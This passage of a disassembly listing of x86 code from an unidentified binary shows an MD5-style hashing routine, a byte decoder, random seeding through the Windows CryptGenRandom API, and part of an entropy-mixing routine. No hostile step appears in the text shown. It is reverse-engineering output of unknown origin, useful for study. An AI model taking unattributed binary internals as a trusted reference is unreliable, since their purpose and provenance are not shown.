lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0BD6DDBCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: .text:004168D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call ds:dword_417024 ; CryptAcquireContextA
push offset dword_41EADC
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE0
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE4
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push offset dword_41EAE8
push 4
push [ebp+var_4]
call ds:dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call ds:dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd dword_41EADC, eax
add eax, ebx
lock xadd dword_41EAE0, eax
add eax, ecx
lock xadd dword_41EAE4, eax
add eax, edx
lock xadd dword_41EAE8, eax
add eax, esi
lock xadd dword_41EADC, eax
add eax, edi
lock xadd dword_41EAE0, eax
add eax, ebp
lock xadd dword_41EAE4, eax
add eax, esp
lock xadd dword_41EAE8, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41EADC, eax
lock xadd dword_41EAE0, eax
lock xadd dword_41EAE4, eax
lock xadd dword_41EAE8, eax
